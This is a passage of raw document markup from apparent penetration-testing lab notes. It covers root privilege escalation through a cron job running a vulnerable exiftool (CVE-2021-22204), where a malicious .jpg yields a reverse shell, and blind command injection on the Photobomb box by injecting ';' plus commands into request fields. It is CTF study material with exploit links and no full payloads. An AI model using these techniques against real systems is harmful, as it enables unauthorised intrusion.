    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002EFF">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In the </w:t>
      </w:r>
      <w:hyperlink r:id="rId1031">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Exfiltrated</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PG Practice, when they ran linPEAS they saw this cronjob:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002F00">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1003300"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="548" name="image520.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image520.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId1032"/>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2F01">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="46"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/opt/image-exif.sh</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002F02">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002F03">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Inside was this:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002F04">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="988"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="3276600"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="102" name="image108.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image108.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId103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2F05">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="988"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The important lines are:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002F06">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="988"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">IMAGES='/var/ww/html/subrion/uploads'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002F07">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="988"/>
        </w:numPr>
        <w:ind w:left="2880" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Tells us the path of the images that exiftool is targeting</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002F08">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="988"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">exiftool "$IMAGES/$filename" &gt;&gt; $LOGFILE</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002F09">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="988"/>
        </w:numPr>
        <w:ind w:left="2880" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This tells us it's targeting files in a specific directory and running the exiftool command</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002F0A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002F0B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">FOR CONTEXT</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: We have a low-privilege shell right now and want to priv esc. The cron job is running as root so if we can exploit this we will likely get root</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002F0C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002F0D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Exiftool actually has a vulnerability. It's </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">CVE-2021-22204</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and I read 3 writeups, all of which gives us root since the cron job is running as root</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002F0E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:hyperlink r:id="rId1034">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">first</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">writeup (my favorite) uses an exploit from exploitdb which creates a malicious .jpg file that when run with exiftool will give us a reverse shell. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002F0F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Make sure to put the .jpg file in the directory above (</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/var/ww/html/subrion/uploads</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">) since that is where the exiftool is targetting files!</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002F10">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId1035">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://www.exploit-db.com/exploits/50911</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002F11">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:hyperlink r:id="rId1036">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">second</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">writeup does the same thing as the first but uses a different github exploit, and they upload it through a previous file upload vulnerability, even though they could have just uploaded it using the shell from foothold</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002F12">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId1037">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://github.com/mr-tuhin/CVE-2021-22204-exiftool</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002F13">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:hyperlink r:id="rId1038">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">third</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">writeup does the entire exploit manually!</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002F14">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002F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16">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002F17">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_yl4wv72ffzqz" w:id="417"/>
      <w:bookmarkEnd w:id="417"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Photos</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002F18">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_ue48tfjcijon" w:id="418"/>
      <w:bookmarkEnd w:id="418"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Command Injection for downloading photos:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002F19">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002F1A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">For the Photobomb easy HTB, when downloading photos, we see three parameters in the Burpsuite request: photo, filetype, dimensions. We can try command injection. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002F1B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002F1C">
      <w:pPr>
        <w:ind w:hanging="1440"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="7710488" cy="2619589"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="497" name="image480.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image480.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId292"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="7710488" cy="261958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F1D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1383"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">First, send the request to the Repeater Tab so we can try things easier</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002F1E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1383"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Then we attempt to test for a command injection vulnerability by entering a semi-colon (which is a delimiter for commands in Bash as well as most scripting languages) into each field, followed by the command id</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002F1F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002F20">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1383"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The application does not return any useful output within the HTTP response, so a different technique is required for testing. Doesn't mean that the commands aren't vulnerable, it just means that it doesn't show any output so maybe it involves </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">blind command injection</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, where we don't see any visible output of confirmation!</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002F21">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002F22">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1143000"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="96" name="image86.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image86.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId293"/>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2F23">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="352"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo tcpdump -ni tun0 icmp</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002F24">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="352"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We proceed to edit the command that we are attempting to inject to a ping command, which if successful will send ICMP packets to the specified address. To capture such packets, we set up a tcpdump for all ICMP traffic on the tun0 interface of our local machine, which is by default used by our lab VPN.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002F25">
      <w:pPr>
        <w:ind w:hanging="1440"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="7745720" cy="2532255"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="158" name="image146.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image146.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId294"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="7745720" cy="25322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F26">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002F27">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="557"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
